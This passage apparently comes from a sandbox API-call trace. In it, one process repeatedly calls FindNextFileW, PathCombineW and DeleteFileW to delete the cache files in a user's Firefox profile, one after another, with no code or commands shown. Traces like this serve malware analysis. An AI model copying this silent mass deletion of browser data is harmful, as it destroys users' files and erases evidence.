"c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\3fb6de7747dc1b658385638d277cf2d620d232e4")) returned 1 [0253.698] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.698] lstrlenW (lpString="400E86363026A9AC2DCD2221C145C6370E3E8EDA") returned 40 [0253.698] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="400E86363026A9AC2DCD2221C145C6370E3E8EDA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\400E86363026A9AC2DCD2221C145C6370E3E8EDA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\400E86363026A9AC2DCD2221C145C6370E3E8EDA" [0253.698] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\400E86363026A9AC2DCD2221C145C6370E3E8EDA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\400e86363026a9ac2dcd2221c145c6370e3e8eda")) returned 1 [0253.699] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.699] lstrlenW (lpString="4030DFFE47D5B75257AA7A8C0A26B737E2F00FF3") returned 40 [0253.699] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4030DFFE47D5B75257AA7A8C0A26B737E2F00FF3" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4030DFFE47D5B75257AA7A8C0A26B737E2F00FF3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4030DFFE47D5B75257AA7A8C0A26B737E2F00FF3" [0253.699] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4030DFFE47D5B75257AA7A8C0A26B737E2F00FF3" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4030dffe47d5b75257aa7a8c0a26b737e2f00ff3")) returned 1 [0253.699] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.699] lstrlenW (lpString="40645D76E586E360D63982B2D4525920F0CF3060") returned 40 [0253.699] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="40645D76E586E360D63982B2D4525920F0CF3060" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\40645D76E586E360D63982B2D4525920F0CF3060") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\40645D76E586E360D63982B2D4525920F0CF3060" [0253.699] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\40645D76E586E360D63982B2D4525920F0CF3060" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\40645d76e586e360d63982b2d4525920f0cf3060")) returned 1 [0253.700] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.700] lstrlenW (lpString="406839CA18775158E58D75B2837624917D7E685C") returned 40 [0253.700] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="406839CA18775158E58D75B2837624917D7E685C" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\406839CA18775158E58D75B2837624917D7E685C") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\406839CA18775158E58D75B2837624917D7E685C" [0253.700] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\406839CA18775158E58D75B2837624917D7E685C" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\406839ca18775158e58d75b2837624917d7e685c")) returned 1 [0253.701] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.701] lstrlenW (lpString="407EB4DE353DE3AD4E1A29F0E0E84F65C2CE6E3A") returned 40 [0253.701] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="407EB4DE353DE3AD4E1A29F0E0E84F65C2CE6E3A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\407EB4DE353DE3AD4E1A29F0E0E84F65C2CE6E3A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\407EB4DE353DE3AD4E1A29F0E0E84F65C2CE6E3A" [0253.701] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\407EB4DE353DE3AD4E1A29F0E0E84F65C2CE6E3A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\407eb4de353de3ad4e1a29f0e0e84f65c2ce6e3a")) returned 1 [0253.702] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.702] lstrlenW (lpString="41367369B0154D1D2566CC216318C71115E089A2") returned 40 [0253.702] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="41367369B0154D1D2566CC216318C71115E089A2" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\41367369B0154D1D2566CC216318C71115E089A2") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\41367369B0154D1D2566CC216318C71115E089A2" [0253.702] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\41367369B0154D1D2566CC216318C71115E089A2" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\41367369b0154d1d2566cc216318c71115e089a2")) returned 1 [0253.703] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.703] lstrlenW (lpString="4238786CB87B503754EE13346F30AE3FCE28174F") returned 40 [0253.703] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4238786CB87B503754EE13346F30AE3FCE28174F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4238786CB87B503754EE13346F30AE3FCE28174F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4238786CB87B503754EE13346F30AE3FCE28174F" [0253.703] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4238786CB87B503754EE13346F30AE3FCE28174F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4238786cb87b503754ee13346f30ae3fce28174f")) returned 1 [0253.703] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.703] lstrlenW (lpString="425AB3A135AC92C5F7A29092F686A777B30A8C0A") returned 40 [0253.703] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="425AB3A135AC92C5F7A29092F686A777B30A8C0A" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\425AB3A135AC92C5F7A29092F686A777B30A8C0A") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\425AB3A135AC92C5F7A29092F686A777B30A8C0A" [0253.704] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\425AB3A135AC92C5F7A29092F686A777B30A8C0A" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\425ab3a135ac92c5f7a29092f686a777b30a8c0a")) returned 1 [0253.705] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.705] lstrlenW (lpString="42C23BB7242DFE074931A302B5BEB9B1D73B0BA5") returned 40 [0253.705] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="42C23BB7242DFE074931A302B5BEB9B1D73B0BA5" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\42C23BB7242DFE074931A302B5BEB9B1D73B0BA5") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\42C23BB7242DFE074931A302B5BEB9B1D73B0BA5" [0253.705] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\42C23BB7242DFE074931A302B5BEB9B1D73B0BA5" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\42c23bb7242dfe074931a302b5beb9b1d73b0ba5")) returned 1 [0253.706] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.706] lstrlenW (lpString="431BDCA04B51BE586DFCF48431166463879B3DBF") returned 40 [0253.706] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="431BDCA04B51BE586DFCF48431166463879B3DBF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\431BDCA04B51BE586DFCF48431166463879B3DBF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\431BDCA04B51BE586DFCF48431166463879B3DBF" [0253.706] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\431BDCA04B51BE586DFCF48431166463879B3DBF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\431bdca04b51be586dfcf48431166463879b3dbf")) returned 1 [0253.706] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.706] lstrlenW (lpString="434A5C8B5D0BEF67CEEB6076803A286CAE99C8C9") returned 40 [0253.706] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="434A5C8B5D0BEF67CEEB6076803A286CAE99C8C9" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\434A5C8B5D0BEF67CEEB6076803A286CAE99C8C9") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\434A5C8B5D0BEF67CEEB6076803A286CAE99C8C9" [0253.706] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\434A5C8B5D0BEF67CEEB6076803A286CAE99C8C9" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\434a5c8b5d0bef67ceeb6076803a286cae99c8c9")) returned 1 [0253.708] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.746] lstrlenW (lpString="43686105AC844B29A19E4AD788A5ABBD2714FC75") returned 40 [0253.746] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="43686105AC844B29A19E4AD788A5ABBD2714FC75" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\43686105AC844B29A19E4AD788A5ABBD2714FC75") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\43686105AC844B29A19E4AD788A5ABBD2714FC75" [0253.746] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\43686105AC844B29A19E4AD788A5ABBD2714FC75" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\43686105ac844b29a19e4ad788a5abbd2714fc75")) returned 1 [0253.747] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.747] lstrlenW (lpString="438AB448ED7FB7D99CB7CFAB433F9E19A475D0EF") returned 40 [0253.747] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="438AB448ED7FB7D99CB7CFAB433F9E19A475D0EF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\438AB448ED7FB7D99CB7CFAB433F9E19A475D0EF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\438AB448ED7FB7D99CB7CFAB433F9E19A475D0EF" [0253.747] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\438AB448ED7FB7D99CB7CFAB433F9E19A475D0EF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\438ab448ed7fb7d99cb7cfab433f9e19a475d0ef")) returned 1 [0253.748] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.748] lstrlenW (lpString="43A641B524487AFDAC7A8AF548EE196228BF6EAE") returned 40 [0253.748] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="43A641B524487AFDAC7A8AF548EE196228BF6EAE" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\43A641B524487AFDAC7A8AF548EE196228BF6EAE") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\43A641B524487AFDAC7A8AF548EE196228BF6EAE" [0253.748] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\43A641B524487AFDAC7A8AF548EE196228BF6EAE" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\43a641b524487afdac7a8af548ee196228bf6eae")) returned 1 [0253.749] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.749] lstrlenW (lpString="44437BAE601C72F5ED96953EAE92C527D4C2D46F") returned 40 [0253.749] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="44437BAE601C72F5ED96953EAE92C527D4C2D46F" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\44437BAE601C72F5ED96953EAE92C527D4C2D46F") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\44437BAE601C72F5ED96953EAE92C527D4C2D46F" [0253.749] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\44437BAE601C72F5ED96953EAE92C527D4C2D46F" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\44437bae601c72f5ed96953eae92c527d4c2d46f")) returned 1 [0253.749] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.749] lstrlenW (lpString="4453CB40F54977CDF96034A3A658080FDA7E43FA") returned 40 [0253.750] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4453CB40F54977CDF96034A3A658080FDA7E43FA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4453CB40F54977CDF96034A3A658080FDA7E43FA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4453CB40F54977CDF96034A3A658080FDA7E43FA" [0253.750] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4453CB40F54977CDF96034A3A658080FDA7E43FA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4453cb40f54977cdf96034a3a658080fda7e43fa")) returned 1 [0253.750] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.750] lstrlenW (lpString="445E695F447CA967C4DAE00C80034130290F80EA") returned 40 [0253.750] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="445E695F447CA967C4DAE00C80034130290F80EA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\445E695F447CA967C4DAE00C80034130290F80EA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\445E695F447CA967C4DAE00C80034130290F80EA" [0253.750] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\445E695F447CA967C4DAE00C80034130290F80EA" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\445e695f447ca967c4dae00c80034130290f80ea")) returned 1 [0253.751] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.751] lstrlenW (lpString="45A759AC8024EF1FCC5ECA005CEB9C4A4F78984E") returned 40 [0253.751] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="45A759AC8024EF1FCC5ECA005CEB9C4A4F78984E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\45A759AC8024EF1FCC5ECA005CEB9C4A4F78984E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\45A759AC8024EF1FCC5ECA005CEB9C4A4F78984E" [0253.751] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\45A759AC8024EF1FCC5ECA005CEB9C4A4F78984E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\45a759ac8024ef1fcc5eca005ceb9c4a4f78984e")) returned 1 [0253.752] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.752] lstrlenW (lpString="45C64E5C2E9809667C5FC9F06FC42641326DF768") returned 40 [0253.752] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="45C64E5C2E9809667C5FC9F06FC42641326DF768" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\45C64E5C2E9809667C5FC9F06FC42641326DF768") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\45C64E5C2E9809667C5FC9F06FC42641326DF768" [0253.752] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\45C64E5C2E9809667C5FC9F06FC42641326DF768" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\45c64e5c2e9809667c5fc9f06fc42641326df768")) returned 1 [0253.753] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.753] lstrlenW (lpString="4613B437E86D18E98F830433A5E6F7F9ABAF3693") returned 40 [0253.753] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="4613B437E86D18E98F830433A5E6F7F9ABAF3693" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4613B437E86D18E98F830433A5E6F7F9ABAF3693") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4613B437E86D18E98F830433A5E6F7F9ABAF3693" [0253.753] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\4613B437E86D18E98F830433A5E6F7F9ABAF3693" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\4613b437e86d18e98f830433a5e6f7f9abaf3693")) returned 1 [0253.753] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.753] lstrlenW (lpString="467A961D019F23E5AF0F0266CD78A5F3D3290E5B") returned 40 [0253.753] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="467A961D019F23E5AF0F0266CD78A5F3D3290E5B" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\467A961D019F23E5AF0F0266CD78A5F3D3290E5B") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\467A961D019F23E5AF0F0266CD78A5F3D3290E5B" [0253.754] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\467A961D019F23E5AF0F0266CD78A5F3D3290E5B" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\467a961d019f23e5af0f0266cd78a5f3d3290e5b")) returned 1 [0253.755] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.755] lstrlenW (lpString="489059ED134C75D04357FD895C6280E1F7978C59") returned 40 [0253.755] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="489059ED134C75D04357FD895C6280E1F7978C59" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\489059ED134C75D04357FD895C6280E1F7978C59") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\489059ED134C75D04357FD895C6280E1F7978C59" [0253.755] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\489059ED134C75D04357FD895C6280E1F7978C59" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\489059ed134c75d04357fd895c6280e1f7978c59")) returned 1 